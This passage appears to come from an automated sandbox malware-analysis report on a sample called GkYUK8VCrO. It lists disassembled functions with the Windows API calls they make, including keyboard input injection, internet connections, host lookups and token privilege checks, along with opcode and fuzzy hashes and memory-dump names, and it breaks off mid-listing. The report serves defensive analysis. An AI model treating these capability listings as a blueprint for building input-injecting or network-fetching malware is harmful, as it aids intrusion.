Opcode Fuzzy Hash: c1ee6d38f6b6acdf71c3e3418d825a99b913ba539cab5b0641fc55d5ef828f53
Instruction Fuzzy Hash: 4831EA74602224BFEF209F18EC9DFA937E5EB09310F14459AFA59D72E0CF3699419B81

Function 00B2ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B2AE1A
GetWindowRect.USER32(?,?), ref: 00B2AE90
PtInRect.USER32(?,?,00B2C304), ref: 00B2AEA0
MessageBeep.USER32(00000000), ref: 00B2AF11

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 2fb16b166151445584309618a0a727a96b5dab3c4b640e228a958811afb97fd9
Instruction ID: 8a703196c29ada66a619ad59fb5f5fd893e588137389d197bf4ac6ee43b13fd3
Opcode Fuzzy Hash: 2fb16b166151445584309618a0a727a96b5dab3c4b640e228a958811afb97fd9
Instruction Fuzzy Hash: C1418070600225DFCB11EF68E884B69BBF5FB88350F2581E9E41CDB255D730A902CF92

Function 00B00FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B01037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00B01053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B010B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B0110B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
Instruction ID: 500d80ad01a3fe0f8b4e6d39f31a623dd223dab1aa3644dd995d652e01e2175b
Opcode Fuzzy Hash: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
Instruction Fuzzy Hash: B7313730E40688AEFB388B6D8C05BFABFF9EB45310F0446AAE5C1521D1E37589C19751

Function 00B01121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B01176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B01192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B011F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B01243

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
Instruction ID: 2cca0d00b7bec687f544d817a54e1542cb7456e4b15befb9ad62a95e70349064
Opcode Fuzzy Hash: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
Instruction Fuzzy Hash: 80310530A40608AAEF3D9A6D8804BFABFFAEB59314F044B9AF581A21D1C3348D959751

Function 00AD6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AD644B
__isleadbyte_l.LIBCMT ref: 00AD6479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD64A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD64DD

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d655cdb0c1069e7a7e7402d94cf074950d0e52c4e1105c8054c18ea889b80aeb
Instruction ID: 390c806574fe4e925d35396308b8a1e9dc2b081d6340148e103bd848f443ed98
Opcode Fuzzy Hash: d655cdb0c1069e7a7e7402d94cf074950d0e52c4e1105c8054c18ea889b80aeb
Instruction Fuzzy Hash: 2431CFB1600246AFDF218F65CA45BBA7BB5FF40310F15842AE866872A1EB31D891DB90

Function 00B25175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B25189

Part of subcall function 00B0387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B03897
Part of subcall function 00B0387D: GetCurrentThreadId.KERNEL32 ref: 00B0389E
Part of subcall function 00B0387D: AttachThreadInput.USER32(00000000,?,00B052A7), ref: 00B038A5

GetCaretPos.USER32(?), ref: 00B2519A
ClientToScreen.USER32(00000000,?), ref: 00B251D5
GetForegroundWindow.USER32 ref: 00B251DB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d61e35e4e64b5a919eaf7e65f57c8895bd0340571b87e65210f028751bc2350c
Instruction ID: 2a66e195e472431bc8b766094b9a0de20b7523d58470acf94ebece130f0fe240
Opcode Fuzzy Hash: d61e35e4e64b5a919eaf7e65f57c8895bd0340571b87e65210f028751bc2350c
Instruction Fuzzy Hash: 55311071A00108AFDB10EFA5C9859EFB7FDEF99300F10406AE415E7251EB759E45CBA0

Function 00B2C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetCursorPos.USER32(?), ref: 00B2C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ADBBFB,?,?,?,?,?), ref: 00B2C7D7
GetCursorPos.USER32(?), ref: 00B2C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ADBBFB,?,?,?), ref: 00B2C85E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 2446ac0f6346d9db876d7a135082f0b4a5a917c0b799880a4e0597eb9a35ce44
Instruction ID: d67faf4443ea09a7ba785884e8dd1e97fcc5228a8d539d634368deda13a43acd
Opcode Fuzzy Hash: 2446ac0f6346d9db876d7a135082f0b4a5a917c0b799880a4e0597eb9a35ce44
Instruction Fuzzy Hash: 36314135500028AFDB25CF58D898EFE7FF6EB49710F0441A5F9098B2A1C7355D51DBA0

Function 00AF8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8669
Part of subcall function 00AF8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8673
Part of subcall function 00AF8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8682
Part of subcall function 00AF8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8689
Part of subcall function 00AF8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AF8BEB
_memcmp.LIBCMT ref: 00AF8C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AF8C44
HeapFree.KERNEL32(00000000), ref: 00AF8C4B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: feb5d08c1c18a4d4a239851da0c52796104ae8617fd98c29fc54768bec876cc4
Instruction ID: 7000e56fd90ce72a0554b69f2d2c64b577a0c84d161ee415e5fc4bd6dec70992
Opcode Fuzzy Hash: feb5d08c1c18a4d4a239851da0c52796104ae8617fd98c29fc54768bec876cc4
Instruction Fuzzy Hash: 0C216971E0120DABDB10DFE4C945BBEB7B8EF44355F154069E654AB240DB39AA06CB60

Function 00AC0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00AC0BF2

Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07B20,?,?,00000000), ref: 00AA5B8C
Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07B20,?,?,00000000,?,?), ref: 00AA5BB0

_fprintf.LIBCMT ref: 00AC0C29
OutputDebugStringW.KERNEL32(?), ref: 00AF6331

Part of subcall function 00AC4CDA: _flsall.LIBCMT ref: 00AC4CF3

__setmode.LIBCMT ref: 00AC0C5E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: be7398d92894fb4d2dcc79c5f87df2b40904f3265367614810ce08958aad899f
Instruction ID: fe7df2c3532ed4beede6be8c4812b4dcbaf67a2f8834bcbb07440c76e5e80420
Opcode Fuzzy Hash: be7398d92894fb4d2dcc79c5f87df2b40904f3265367614810ce08958aad899f
Instruction Fuzzy Hash: 41115932908208BBCB04B7B49D43EBEBB6C9F4A320F14015EF204971D2EF315D568799

Function 00B11A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B11A97

Part of subcall function 00B11B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B11B40
Part of subcall function 00B11B21: InternetCloseHandle.WININET(00000000), ref: 00B11BDD

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
Instruction ID: e764fbfc21053b9443969d8435b7090433626990d25877b8f313d9cc90f9c4d1
Opcode Fuzzy Hash: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
Instruction Fuzzy Hash: 4021C235204601BFDB119F648C40FFBBBFDFF44700F50046AFA5196560EB31986197A0

Function 00AFE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AFF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AFE1C4,?,?,?,00AFEFB7,00000000,000000EF,00000119,?,?), ref: 00AFF5BC
Part of subcall function 00AFF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00AFF5E2
Part of subcall function 00AFF5AD: lstrcmpiW.KERNEL32(00000000,?,00AFE1C4,?,?,?,00AFEFB7,00000000,000000EF,00000119,?,?), ref: 00AFF613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AFEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE1DD
lstrcpyW.KERNEL32(00000000,?), ref: 00AFE203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00AFEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE237

Strings

cdecl, xrefs: 00AFE22E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 0f272654b26ee7013c3eb160877d3b536e6fc6583541187fc90e78438b3867c9
Instruction ID: e00d6d168f5797c2148523bc415fff396e490a3a38420d1603d0e678e906eedd
Opcode Fuzzy Hash: 0f272654b26ee7013c3eb160877d3b536e6fc6583541187fc90e78438b3867c9
Instruction Fuzzy Hash: 7A117F36200349EFCB25AFA4D845EBA77B8FF85750B40402AF906CB264FB71985197A0

Function 00AD5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD5351

Part of subcall function 00AC594C: __FF_MSGBANNER.LIBCMT ref: 00AC5963
Part of subcall function 00AC594C: __NMSG_WRITE.LIBCMT ref: 00AC596A
Part of subcall function 00AC594C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,00000000,?,?,?,00AC1013,?), ref: 00AC598F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 329aa2bc5fd3f021d04378a2cd10158808c0b153a1009b3c6e1f358ad92694cb
Instruction ID: 8009eaf2cc283395b63ec793119723523a811fee6a8f6545137c4da49bec2a7b
Opcode Fuzzy Hash: 329aa2bc5fd3f021d04378a2cd10158808c0b153a1009b3c6e1f358ad92694cb
Instruction Fuzzy Hash: F711C432D04A15AFCF312F70A924B6937A46F107E0B11442FF9079E290DFB9C9418790

Function 00AA4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA4560

Part of subcall function 00AA410D: _memset.LIBCMT ref: 00AA418D
Part of subcall function 00AA410D: _wcscpy.LIBCMT ref: 00AA41E1
Part of subcall function 00AA410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA41F1

KillTimer.USER32(?,00000001,?,?), ref: 00AA45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ADD6CE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 26fbf4a19e8de6dcd1a3ac4da5e0c48240afd0e013c9806a77038f57594c86d3
Instruction ID: 5d9d42a2a22d50f2385dfb4bed85b010862db979dca59c2339f2a5ed106ccc2f
Opcode Fuzzy Hash: 26fbf4a19e8de6dcd1a3ac4da5e0c48240afd0e013c9806a77038f57594c86d3
Instruction Fuzzy Hash: 5221C870904784AFEB328B24D855BE7BBFC9F45304F04009EE69E57285C7B45E858B91

Function 00B1667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07B20,?,?,00000000), ref: 00AA5B8C
Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07B20,?,?,00000000,?,?), ref: 00AA5BB0

gethostbyname.WSOCK32(?,?,?), ref: 00B166AC
WSAGetLastError.WSOCK32(00000000), ref: 00B166B7
_memmove.LIBCMT ref: 00B166E4
inet_ntoa.WSOCK32(?), ref: 00B166EF

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: d69401ef3caf29a42f49c4435341f5799fa83c3a654aa9ad03a982e169fbc7b1
Instruction ID: 030f0702a7e8bb4d03e79efc25631ca9686f3f87f5d615324ac7d32fc9594431
Opcode Fuzzy Hash: d69401ef3caf29a42f49c4435341f5799fa83c3a654aa9ad03a982e169fbc7b1
Instruction Fuzzy Hash: FE112E35900509AFCB05EBA4DE86DEEB7B8AF19310B144065F506A71A1EF31AE44DBA1

Function 00AF9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF9055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF9086

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
Instruction ID: 662555b58251af27d588f171bd4deefad2d6498a0731a3e3724aa9cec42ccbab
Opcode Fuzzy Hash: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
Instruction Fuzzy Hash: 15114C79900218FFDB11DFA5C984FAEBB74FB48310F2040A5FA04B7250DA726E10DB90

Function 00AA1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8
GetClientRect.USER32(?,?), ref: 00ADB84B
